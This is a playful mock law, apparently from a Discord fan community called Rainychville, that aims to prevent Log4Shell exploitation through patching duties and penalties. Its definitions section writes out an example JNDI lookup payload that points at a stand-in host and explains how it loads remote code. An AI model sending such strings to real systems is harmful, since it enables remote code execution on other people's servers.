[From RandomFan#3511 Rainychville Law Services]
[ECIR 12.1.355.8]




-----------------------------------------------------------------------------

            Rainychville Government

            January 12, 2022 CE

            Log4Shell Prevention Act

                AN ACT

        To prevent the exploitation of the
        "Log4Shell" vulnerability in the Java
        library known as Log4J.

-----------------------------------------------------------------------------

SEC 1. SHORT TITLE.
   This act may be cited as the ``Log4Shell Prevention Act``.
SEC 2. DEFINITIONS.
    (1) Java, as a programming language, wherein a program to print out
     "Hello World" may be defined as:
        public class Main {
            public static void main (String[] args) {
                System.out.println("Hello World");
            }
        }
     where such program is placed in a file named Main.java;
    (2) Log4J as a logging library for the Java programming
     language, allowing for debugging messages and information about
     the operations of a program or it's error handling to be logged
     and therefore interpreted by programmers for the purposes of
     rectifying errors or debugging;
    (3) Log4Shell as a severe vulnerability in Log4J, allowing for the
     execution of remote code by sending specially formatted strings,
     some of which could load code and execute it, regardless of trust
     or permission level wherein such specially formatted string may
     be something such as ``{$jndi:ldap://example.com:389/badcode.java}``
     where ``{$jndi:ldap`` instructs Log4J to load remote code from
     ``example.com:389/badcode.java``, where ``389`` is the port number,
     and ``badcode.java`` is the location of the attacker's code, and
     that the code loaded from the ``{$jndi:ldap`` is executed, with
     no permission checks;
    (4) Unauthenticated remote code execution, or RCE, as the execution of
     arbitrary code on a server, where the code is malicious or violates any
     Rainychville law surrounding computers, or where it's execution is
     undesirable to the owner or maintainer of the computer on which it is
     executed, such as the undesired action by Log4J defined in Section 2.3;
    (5) Code or program as any set of instructions understandable by any
     computer, whether machine code, human-readable code interpreted by
     an interpreter (such as Python);
    (6) Computer or machine as any contraption capable of automatically
     performing calculations or tasks;
    (7) Sensitive data as any data, machine-readable, human-readable, or
     program-readable, that details any sensitive information, where
     such sensitive information may include:
        (a) personal information, as defined by section 1006, clause 2 of
         the Rainychville TOS;
        (b) government or state secrets, such as:
            (i) information on the locations of silos or facilities
             that support the use of weapons of mass destruction
             such as nukes, hydrogen bombs, death stars;
            (ii) locations of espionage agents, where such agents are
             performing any kind of tasks for the Rainychville
             Government;
            (iii) plans detailing military actions, or any information
             which may benefit an enemy or put Rainychville at a
             disadvantage in times of war or conflict;
    (8) Environment as information on the unique set of software installed
     on the computer's operating system, it's configurations;
    (9) Environment variables as a series of key-value pairs on the computer,
     which defines values critical or useful to it's operation, including but
     not limited to:
        (a) API keys for accessing application programming interfaces,
         services, and other resources on remote servers, where this API
         key may be used for authorization, or authentication; and
        (b) configuration settings for programs which operate in the shell.
SEC 3. FAILURE TO PATCH LOG4J.
    (1) Any organization that fails to protect personal or sensitive data,
     by deliberate failure to patch the Log4Shell exploit, or prevent it's
     exploitation via other means such as alteration of environment
     variables or preventing LDAP lookups, shall be criminally liable
     for the breach of said data, and any other Rainychville law broken
     by the leakage of said data. Aforementioned organizations covered
     include but are not limited to:
        (a) Private or public companies;
        (b) The Rainychville Government itself; and
        (c) Individuals who operate or control services that
         may be affected by the exploit;
     where such organization:
        (a) operates in the jurisdiction of Rainychville;
        (b) is in possession, whether such data is encrypted at rest
         and not usable by the organization itself, only by programs
         which the organization controls, of any sensitive data;
    (2) Organizations as defined by Section 3.1, shall be permitted to
     deliberately maintain environments where Log4Shell is exploitable,
     for the purposes of demonstration, penetration testing, ethical
     hacking, or experimentation.
    (3) Whereas it is infeasible to update Log4J to the latest version,
     such organization may also alter their environment or it's
     variables, or their copy of Log4J itself to prevent the exploitation
     of Log4Shell.
SEC 4. EXPLOITATION OF LOG4SHELL.
    (1) The exploitation of the Log4Shell exploit shall be considered to be
     a method of hacking a computer, or networks of computers, or part of
     the act of hacking where the exploitation of such is defined as the
     usage of the exploit in non-ethical hacking actions to perform remote
     code execution or attain unauthorized access to a server's environment
     variables.
    (2) The standard exceptions for demonstration, penetration testing,
     ethical hacking shall also apply to the act of exploiting the Log4Shell
     exploit.
    (3) If any exploitation of Log4Shell affects Rainych herself negatively,
     any hacker responsible for affecting Rainych negatively via the Log4Shell
     exploit, where it can be reliably proven in court, shall be permanently
     banned from the Rainychville Discord server, without the ability to
     appeal such a ban.
SEC 5. GOVERNMENT PATCHING OF LOG4SHELL.
    (1) The Rainychville Government itself must make reasonable efforts to
     patch the Log4Shell vulnerability in all programs that they operate or
     control, where such programs may be wholly written in Java, or at the
     very least contain components that use or interact with Java code.
    (2) To allow compliance with Section 5.1, Rainychville government
     divisions shall be granted the power to demand copies of the source
     code of any Java program that they use, within reason, where the reason
     for such demand shall be exclusively the modification of the software
     to prevent Log4Shell's exploitation, where such program may be proprietary
     or where the developer does not provide users of the software with access
     to the source code or any easily modifiable form of the program.
    (3) If the program's source code is required and the program's source
     code is accessible but does not meet the definition of "open source",
     the Rainychville Government, within reason, when modifying the source
     code even against the wishes of it's author or maintainer, be immune
     to any claim of copyright infringement or the violation of any contract,
     proven such modification only prevents the exploitation of Log4Shell,
     and that there is no other change made to the program's features.
    (4) Any investigation into possible abuse of the rights granted to the
     Rainychville government defined in Sections 5.2 and 5.3 shall be
     prioritized and anyone caught abusing such power prioritized for removal
     from any position of trust or power within the Rainychville Government,
     and banned from holding or regaining any such position, whereas such any
     person who has recieved such a ban may only appeal it after extensive
     probation and background checks.
    (5) New programs in Java being developed by the Rainychville Government
     shall be discouraged from utilizing the Log4J logging library to
     prevent vulnerabilities or the exploitation of Log4Shell. These
     programs shall instead use alternative Java logging libraries.
SEC 6. IMPORT OF LOG4SHELL-AFFECTED SOFTWARE.
    (1) The transfer of software affected by Log4Shell via a physical medium
     including but not limited to:
        (a) hard disk drives or solid state drives, wherein programs
         which may or may not be affected by Log4Shell are stored, and
         mailed or physically transported to another server or a user's
         computer;
        (b) books wherein the source code is physically written on the
         pages of the book itself, or where significant snippets are
         included in quotes of the book;
     shall be logged and recorded, whereas such transfer, to be covered under
     this law, must be:
        (a) from a server or location outside of the jurisdiction of the
         Rainychville Government, to any location within jurisdiction,
         including any embassies or diplomatic buildings outside of
         Rainychville but owned and operated by the Rainychville
         Government for diplomatic purposes;
        (b) software meant for production;
     whereas exceptions shall be made for:
        (a) the archival of old/legacy software, or old versions of said
         software;
        (b) demonstrations of the Log4Shell vulnerability where it will
         be used for experimentation, penetration testing or ethical
         hacking; and
        (c) software not in production or unlikely to interact with
         sensitive data.
    (2) No logging or recording shall be required for the digital transfer
     of software.
-----------------------------------------------------------------------------
LEGISLATIVE HISTORY: Please review the commit logs of the Git repository that
this law document is stored in.